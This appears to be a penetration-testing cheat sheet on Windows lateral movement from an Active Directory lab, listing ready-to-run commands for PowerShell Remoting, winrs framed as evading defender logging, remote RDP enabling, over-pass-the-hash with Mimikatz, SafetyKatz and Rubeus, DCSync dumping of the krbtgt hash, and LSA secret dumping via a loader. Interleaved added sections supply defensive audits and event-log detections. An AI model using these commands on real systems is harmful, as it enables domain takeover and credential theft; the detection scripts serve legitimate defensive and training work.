# LateralMovement

## Powershell Remoting

PowerShell Remoting (PS Remoting) is a feature of Windows, much like SSH on Linux, that lets administrators run tasks on remote machines without being physically present at each one. It uses Windows Remote Management (WinRM) on port 5985 (HTTP) and 5986 (HTTPS).

## Command to enable PSRemoting

```powershell
Enable-PSRemoting -Force 
```

## Command to enable PSRemoting on remote machine

```powershell
wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
```

## If we have administrative access on another machine after user hunting

```powershell
Enter-PSSession dcorp-adminsrv
```

OR

```powershell
$session = New-PSSession -ComputerName dcorp-adminsrv
Enter-PSSession -Session $session
```
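Before relying on remoting (or when reviewing a host that exposes it), it helps to see exactly how WinRM is configured. The following is an added audit example, not part of the original notes: it reports the listeners, the client `TrustedHosts` setting and the session configuration permissions on the local host. It assumes only the built-in `WSMan:` provider and `Get-PSSessionConfiguration` (the latter needs an elevated prompt).

```powershell
# Added example (not from the original notes): audit how PowerShell Remoting
# is exposed on the local host. Run from an elevated PowerShell prompt.

function Get-WinRmExposure {
    [CmdletBinding()]
    param()

    # Listeners: one entry per transport. An HTTP-only listener means the
    # remoting traffic on 5985 is protected only by the authentication exchange.
    $listeners = Get-ChildItem -Path WSMan:\localhost\Listener -ErrorAction SilentlyContinue |
        ForEach-Object {
            $props = Get-ChildItem -Path $_.PSPath
            [pscustomobject]@{
                Name      = $_.Name
                Transport = ($props | Where-Object Name -eq 'Transport').Value
                Address   = ($props | Where-Object Name -eq 'Address').Value
                Port      = ($props | Where-Object Name -eq 'Port').Value
            }
        }

    # TrustedHosts: a value of '*' on a client means it will send credentials to any host name.
    $trustedHosts = (Get-Item -Path WSMan:\localhost\Client\TrustedHosts -ErrorAction SilentlyContinue).Value

    # Who may open a session: review anything beyond BUILTIN\Administrators
    # and Remote Management Users.
    $configs = Get-PSSessionConfiguration -ErrorAction SilentlyContinue |
        Select-Object Name, Permission

    [pscustomobject]@{
        ServiceRunning = (Get-Service -Name WinRM).Status -eq 'Running'
        Listeners      = $listeners
        HasHttps       = [bool]($listeners | Where-Object Transport -eq 'HTTPS')
        TrustedHosts   = $trustedHosts
        SessionConfigs = $configs
    }
}

$report = Get-WinRmExposure
$report | Format-List
if ($report.ServiceRunning -and -not $report.HasHttps) {
    Write-Warning 'No HTTPS listener: remoting is HTTP-only on 5985.'
}
if ($report.TrustedHosts -eq '*') {
    Write-Warning 'TrustedHosts is "*": this client will send credentials to any host.'
}
```

The two warnings at the end are the findings most often worth raising: an HTTP-only listener, and a wildcard `TrustedHosts` entry on a client.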

## To execute commands in parallel on many machines

If we have the privilege to execute commands on many machines, use the command below. First create a file with the names of the computers to run commands on (one name per line).

```powershell
Invoke-Command -ScriptBlock {Get-Process} -ComputerName (Get-Content <server-lists>)
```

## To execute scripts in parallel on many machines

As above, create a file with the names of the computers/servers to run the script on.

{% code overflow="wrap" %}

```powershell
Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <server-lists>)
```

{% endcode %}

## To evade logging by blue team we can use winrs

```powershell
winrs -remote:<server-name> -u:server1\administrator -p:Pass@123 hostname
```
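winrs runs cmd.exe directly rather than through a PowerShell session, but on the target the WinRM service still spawns a host process for the shell (`winrshost.exe` for WinRS, `wsmprovhost.exe` for PowerShell Remoting). With process creation auditing enabled, every command run this way appears as a child of one of those two processes. The following detection query is an added example, not part of the original notes; it assumes Security event 4688 ("Audit Process Creation") is enabled on the target, ideally with command-line logging.

```powershell
# Added detection example (not from the original notes). Run on the server
# side. Requires "Audit Process Creation" (Security event 4688); the
# CommandLine field is empty unless command-line auditing is also enabled.

function Get-WinRmSpawnedProcesses {
    param(
        [datetime]$Since = (Get-Date).AddDays(-1),
        [string[]]$HostProcesses = @('winrshost.exe', 'wsmprovhost.exe')
    )

    $filter = @{ LogName = 'Security'; Id = 4688; StartTime = $Since }

    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Pull EventData fields by name rather than by positional index.
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        $parent = [string]$data['ParentProcessName']
        $leaf   = [System.IO.Path]::GetFileName($parent).ToLowerInvariant()

        if ($HostProcesses -contains $leaf) {
            [pscustomobject]@{
                Time        = $_.TimeCreated
                Account     = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
                Parent      = $parent
                NewProcess  = $data['NewProcessName']
                CommandLine = $data['CommandLine']
            }
        }
    }
}

Get-WinRmSpawnedProcesses | Sort-Object Time | Format-Table -AutoSize
```

Parsing the event XML by field name avoids depending on the positional order of `Properties`, which differs between Windows versions.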

## Enable RDP access on another computer using a script block

{% code overflow="wrap" %}

```powershell
Invoke-Command -ScriptBlock {
    Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name 'fDenyTSConnections' -Value 0
} -ComputerName dcorp-adminsrv
```

{% endcode %}

## Over Pass The Hash

The AES256 key or RC4 (NTLM) hash needed here can be obtained with Mimikatz or SafetyKatz. Over-pass-the-hash with any of the techniques below uses logon type 9, which means running `whoami` still shows student1 (the current user), but we can access the remote resource, such as the domain controller, simply by running `winrs -r:dcorp-dc cmd`.

### Using Mimikatz (needs elevation: run as administrator)

{% code overflow="wrap" %}

```powershell
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:us.techcorp.local /aes256:<aes256key> /run:powershell.exe"'
```

{% endcode %}

### Using SafetyKatz (needs elevation: run as administrator)

{% code overflow="wrap" %}

```powershell
SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256:<aes256keys> /run:cmd.exe" "exit"
```

{% endcode %}

### Using BetterSafetyKatz

{% code overflow="wrap" %}

```powershell
BetterSafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256:<aes256keys> /run:cmd.exe" "exit"
```

{% endcode %}

### Using Rubeus (doesn't need elevation)

```batch
Rubeus.exe asktgt /user:administrator /rc4:<ntlmhash> /ptt
```

### Using Rubeus (needs elevation)

{% code overflow="wrap" %}

```powershell
Rubeus.exe asktgt /user:administrator /aes256:<aes256keys> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```

{% endcode %}

## DCSync (needs Domain Admin privilege by default)

DCSync is a late-stage kill chain attack: it means the attacker has hold of a user who has Active Directory domain replication rights. Domain replication is the method of updating objects from one DC to another, and during this process the DC returns replication data to the requester, including password hashes.

### DCSync to extract krbtgt hash for us domain

```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
```

### DCSync to extract krbtgt hash for us domain using SafetyKatz

```powershell
SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"
```

### DCSync to extract krbtgt hash using BetterSafetyKatz

```powershell
BetterSafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"
```
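Since DCSync is only possible for principals holding the two replication extended rights on the domain object, the defensive side has two parts: audit who holds those rights, and alert when a non-DC account exercises them. The script below is an added example, not part of the original notes. It assumes the ActiveDirectory module (for the `AD:` drive) on a DC or admin host, and, for the detection half, that "Audit Directory Service Access" is enabled with a SACL on the domain object so that Security event 4662 is written. The two GUIDs are the well-known control access right identifiers for DS-Replication-Get-Changes and DS-Replication-Get-Changes-All.

```powershell
# Added example (not from the original notes): audit and detect use of the
# replication rights that DCSync depends on. Run on a domain controller with
# the ActiveDirectory module available.

$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
}

function Get-ReplicationRightHolders {
    # Who can DCSync: any principal allowed either extended right on the domain head.
    # Expected entries: Domain Controllers, Enterprise Domain Controllers,
    # Administrators, Domain Admins, Enterprise Admins and a directory sync
    # account (e.g. Azure AD Connect) if one is deployed. Anything else is a finding.
    Import-Module ActiveDirectory -ErrorAction Stop
    $domainDn = (Get-ADDomain).DistinguishedName
    (Get-Acl -Path "AD:\$domainDn").Access |
        Where-Object { $ReplicationRights.ContainsKey($_.ObjectType.ToString()) -and $_.AccessControlType -eq 'Allow' } |
        ForEach-Object {
            [pscustomobject]@{
                Identity  = $_.IdentityReference.Value
                Right     = $ReplicationRights[$_.ObjectType.ToString()]
                Inherited = $_.IsInherited
            }
        }
}

function Get-DcSyncEvents {
    param([datetime]$Since = (Get-Date).AddDays(-1))

    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4662; StartTime = $Since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        # 4662 lists the accessed control access rights as GUIDs in 'Properties'.
        $props = [string]$data['Properties']
        $hit   = $ReplicationRights.Keys | Where-Object { $props -match $_ }

        # Domain controllers replicate legitimately; their machine accounts end in '$'.
        if ($hit -and $data['SubjectUserName'] -notlike '*$') {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Account = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
                Right   = ($hit | ForEach-Object { $ReplicationRights[$_] }) -join ', '
                Object  = $data['ObjectName']
            }
        }
    }
}

Get-ReplicationRightHolders | Format-Table -AutoSize
Get-DcSyncEvents | Sort-Object Time | Format-Table -AutoSize
```

The `-notlike '*$'` filter is the usual noise cut; a directory sync account also replicates on a schedule, so baseline it by name rather than widening the exclusion.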

## If the above does not work, use the commands below to get the NTLM hash (not the AES key)

Use the `"lsadump::lsa /patch" "exit"` arguments instead:

{% code overflow="wrap" %}

```powershell
.\Loader.exe -path http://127.0.0.1:8080/BetterSafetyKatz.exe "lsadump::lsa /patch" "exit"
```

{% endcode %}

```powershell
BetterSafetyKatz.exe "lsadump::lsa /patch"
```

```powershell
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
```

```powershell
SafetyKatz.exe "lsadump::lsa /patch"
```
